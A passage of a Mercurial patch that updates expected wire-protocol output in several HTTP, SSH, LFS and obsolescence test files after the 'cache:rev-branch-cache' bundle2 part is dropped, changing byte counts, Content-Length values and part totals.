from 9) -> (178) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (169) 4\\r\\n\x00\x00\x00#\\r\\n (esc) - write(41 from 41) -> (128) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc) - write(9 from 9) -> (119) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (110) 4\\r\\n\x00\x00\x00\x1d\\r\\n (esc) - write(35 from 35) -> (75) 1d\\r\\n\x16cache:rev-branch-cache\x00\x00\x00\x03\x00\x00\\r\\n (esc) - write(9 from 9) -> (66) 4\\r\\n\x00\x00\x00'\\r\\n (esc) - write(45 from 45) -> (21) 27\\r\\n\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x00default\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\\r\\n (esc) + $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -22 + write(9 from 9) -> (747) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + write(9 from 9) -> (738) 4\\r\\n\x00\x00\x00)\\r\\n (esc) + write(47 from 47) -> (691) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc) + write(9 from 9) -> (682) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc) + write(473 from 473) -> (209) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc) + write(9 from 9) -> (200) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + write(9 from 9) -> (191) 4\\r\\n\x00\x00\x00 \\r\\n (esc) + write(38 from 38) -> (153) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc) + write(9 from 9) -> (144) 4\\r\\n\x00\x00\x00:\\r\\n (esc) + write(64 from 64) -> (80) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n + write(9 from 9) -> (71) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + write(9 from 9) -> (62) 4\\r\\n\x00\x00\x00#\\r\\n (esc) + write(41 from 41) -> (21) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc) write(9 from 9) -> (12) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) write(9 from 9) -> (3) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) write(3 from 5) -> (0) 0\r\n diff --git a/tests/test-http-protocol.t b/tests/test-http-protocol.t --- a/tests/test-http-protocol.t +++ b/tests/test-http-protocol.t @@ -321,7 +321,7 @@ s> Content-Type: application/mercurial-cbor\r\n s> Content-Length: *\r\n (glob) s> \r\n - s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa4Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogNv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa4Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogNv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash sending heads command s> setsockopt(6, 1, 1) -> None (?) s> POST /api/exp-http-v2-0003/ro/heads HTTP/1.1\r\n @@ -437,7 +437,7 @@ s> Server: testing stub value\r\n s> Date: $HTTP_DATE$\r\n s> Content-Type: application/mercurial-0.1\r\n - s> Content-Length: 503\r\n + s> Content-Length: 484\r\n s> \r\n s> batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash @@ -474,7 +474,7 @@ s> Server: testing stub value\r\n s> Date: $HTTP_DATE$\r\n s> Content-Type: application/mercurial-0.1\r\n - s> Content-Length: 503\r\n + s> Content-Length: 484\r\n s> \r\n real URL is http://$LOCALIP:$HGPORT/redirected (glob) s> batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash @@ -745,7 +745,7 @@ s> Server: testing stub value\r\n s> Date: $HTTP_DATE$\r\n s> Content-Type: application/mercurial-0.1\r\n - s> Content-Length: 503\r\n + s> Content-Length: 484\r\n s> \r\n real URL is http://$LOCALIP:$HGPORT/redirected (glob) s> batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash diff --git a/tests/test-http.t b/tests/test-http.t --- a/tests/test-http.t +++ b/tests/test-http.t @@ -348,20 +348,20 @@ list of changesets: 7f4e523d01f2cc3765ac8934da3d14db775ff872 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload sending unbundle command - sending 1040 bytes + sending 1023 bytes devel-peer-request: POST http://localhost:$HGPORT2/?cmd=unbundle - devel-peer-request: Content-length 1040 + devel-peer-request: Content-length 1023 devel-peer-request: Content-type application/mercurial-0.1 devel-peer-request: Vary X-HgArg-1,X-HgProto-1 devel-peer-request: X-hgproto-1 0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull devel-peer-request: 16 bytes of commands arguments in headers - devel-peer-request: 1040 bytes of data + devel-peer-request: 1023 bytes of data devel-peer-request: finished in *.???? seconds (200) (glob) bundle2-input-bundle: no-transaction bundle2-input-part: "reply:changegroup" (advisory) (params: 0 advisory) supported diff --git a/tests/test-lfs-serve-access.t b/tests/test-lfs-serve-access.t --- a/tests/test-lfs-serve-access.t +++ b/tests/test-lfs-serve-access.t @@ -66,7 +66,7 @@ $LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 400 - (glob) $LOCALIP - - [$LOGDATE$] "GET /?cmd=capabilities HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /?cmd=batch HTTP/1.1" 200 - x-hgarg-1:cmds=heads+%3Bknown+nodes%3D x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) - $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) + $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) $LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 400 - (glob) $ rm -f $TESTTMP/access.log $TESTTMP/errors.log @@ -110,9 +110,7 @@ bundle2-input-part: "listkeys" (params: 1 mandatory) supported bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 - bundle2-input-part: "cache:rev-branch-cache" (advisory) supported - bundle2-input-part: total payload size 39 - bundle2-input-bundle: 4 parts total + bundle2-input-bundle: 3 parts total checking for updated bookmarks updating the branch cache added 1 changesets with 1 changes to 1 files @@ -167,7 +165,7 @@ $LOCALIP - - [$LOGDATE$] "POST /missing/objects/batch HTTP/1.1" 404 - (glob) $LOCALIP - - [$LOGDATE$] "GET /subdir/mount/point?cmd=capabilities HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /subdir/mount/point?cmd=batch HTTP/1.1" 200 - x-hgarg-1:cmds=heads+%3Bknown+nodes%3D x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) - $LOCALIP - - [$LOGDATE$] "GET /subdir/mount/point?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) + $LOCALIP - - [$LOGDATE$] "GET /subdir/mount/point?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) $LOCALIP - - [$LOGDATE$] "POST /subdir/mount/point/.git/info/lfs/objects/batch HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /subdir/mount/point/.hg/lfs/objects/f03217a32529a28a42d03b1244fe09b6e0f9fd06d7b966d4d50567be2abe6c0e HTTP/1.1" 200 - (glob) @@ -313,7 +311,7 @@ $ cat $TESTTMP/access.log $LOCALIP - - [$LOGDATE$] "GET /?cmd=capabilities HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /?cmd=batch HTTP/1.1" 200 - x-hgarg-1:cmds=heads+%3Bknown+nodes%3D x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) - $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) + $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) $LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /?cmd=capabilities HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /?cmd=batch HTTP/1.1" 200 - x-hgarg-1:cmds=heads+%3Bknown+nodes%3D392c05922088bacf8e68a6939b480017afbf245d x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) @@ -332,7 +330,7 @@ $LOCALIP - - [$LOGDATE$] "PUT /.hg/lfs/objects/b5bb9d8014a0f9b1d61e21e796d78dccdf1352f23cd32812f4850b878ae4944c HTTP/1.1" 422 - (glob) $LOCALIP - - [$LOGDATE$] "GET /?cmd=capabilities HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /?cmd=batch HTTP/1.1" 200 - x-hgarg-1:cmds=heads+%3Bknown+nodes%3D392c05922088bacf8e68a6939b480017afbf245d x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) - $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=525251863cad618e55d483555f3d00a2ca99597e&heads=506bf3d83f78c54b89e81c6411adee19fdf02156+525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) + $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=525251863cad618e55d483555f3d00a2ca99597e&heads=506bf3d83f78c54b89e81c6411adee19fdf02156+525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) $LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /.hg/lfs/objects/276f73cfd75f9fb519810df5f5d96d6594ca2521abd86cbcd92122f7d51a1f3d HTTP/1.1" 500 - (glob) $LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 200 - (glob) @@ -483,7 +481,7 @@ $LOCALIP - - [$LOGDATE$] "GET /?cmd=capabilities HTTP/1.1" 401 - (glob) $LOCALIP - - [$LOGDATE$] "GET /?cmd=capabilities HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /?cmd=batch HTTP/1.1" 200 - x-hgarg-1:cmds=heads+%3Bknown+nodes%3D x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) - $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=506bf3d83f78c54b89e81c6411adee19fdf02156+525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) + $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=506bf3d83f78c54b89e81c6411adee19fdf02156+525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob) $LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 401 - (glob) $LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 200 - (glob) $LOCALIP - - [$LOGDATE$] "GET /.hg/lfs/objects/276f73cfd75f9fb519810df5f5d96d6594ca2521abd86cbcd92122f7d51a1f3d HTTP/1.1" 200 - (glob) diff --git a/tests/test-obsolete-changeset-exchange.t b/tests/test-obsolete-changeset-exchange.t --- a/tests/test-obsolete-changeset-exchange.t +++ b/tests/test-obsolete-changeset-exchange.t @@ -158,11 +158,10 @@ list of changesets: bec0734cd68e84477ba7fc1d13e6cff53ab70129 listing keys for "bookmarks" - bundle2-output-bundle: "HG20", 4 parts total + bundle2-output-bundle: "HG20", 3 parts total bundle2-output-part: "changegroup" (params: 1 mandatory 1 advisory) streamed payload bundle2-output-part: "listkeys" (params: 1 mandatory) empty payload bundle2-output-part: "phase-heads" 24 bytes payload - bundle2-output-part: "cache:rev-branch-cache" (advisory) streamed payload bundle2-input-bundle: with-transaction bundle2-input-part: "changegroup" (params: 1 mandatory 1 advisory) supported adding changesets @@ -174,9 +173,7 @@ bundle2-input-part: "listkeys" (params: 1 mandatory) supported bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 - bundle2-input-part: "cache:rev-branch-cache" (advisory) supported - bundle2-input-part: total payload size 39 - bundle2-input-bundle: 4 parts total + bundle2-input-bundle: 3 parts total checking for updated bookmarks updating the branch cache added 1 changesets with 1 changes to 1 files (+1 heads) diff --git a/tests/test-obsolete-distributed.t b/tests/test-obsolete-distributed.t --- a/tests/test-obsolete-distributed.t +++ b/tests/test-obsolete-distributed.t @@ -151,12 +151,11 @@ list of changesets: 391a2bf12b1b8b05a72400ae36b26d50a091dc22 listing keys for "bookmarks" - bundle2-output-bundle: "HG20", 5 parts total + bundle2-output-bundle: "HG20", 4 parts total bundle2-output-part: "changegroup" (params: 1 mandatory 1 advisory) streamed payload bundle2-output-part: "listkeys" (params: 1 mandatory) empty payload bundle2-output-part: "obsmarkers" streamed payload bundle2-output-part: "phase-heads" 48 bytes payload - bundle2-output-part: "cache:rev-branch-cache" (advisory) streamed payload bundle2-input-bundle: with-transaction bundle2-input-part: "changegroup" (params: 1 mandatory 1 advisory) supported adding changesets @@ -170,9 +169,7 @@ bundle2-input-part: total payload size 143 bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 48 - bundle2-input-part: "cache:rev-branch-cache" (advisory) supported - bundle2-input-part: total payload size 39 - bundle2-input-bundle: 5 parts total + bundle2-input-bundle: 4 parts total checking for updated bookmarks adding 1 changesets with 1 changes to 1 files (+1 heads) 1 new obsolescence markers diff --git a/tests/test-ssh-bundle1.t b/tests/test-ssh-bundle1.t --- a/tests/test-ssh-bundle1.t +++ b/tests/test-ssh-bundle1.t @@ -482,7 +482,7 @@ sending upgrade request: * proto=exp-ssh-v2-0003 (glob) (sshv2 !) sending hello command sending between command - remote: 463 (sshv1 !) + remote: 444 (sshv1 !) protocol upgraded to exp-ssh-v2-0003 (sshv2 !) remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash remote: 1 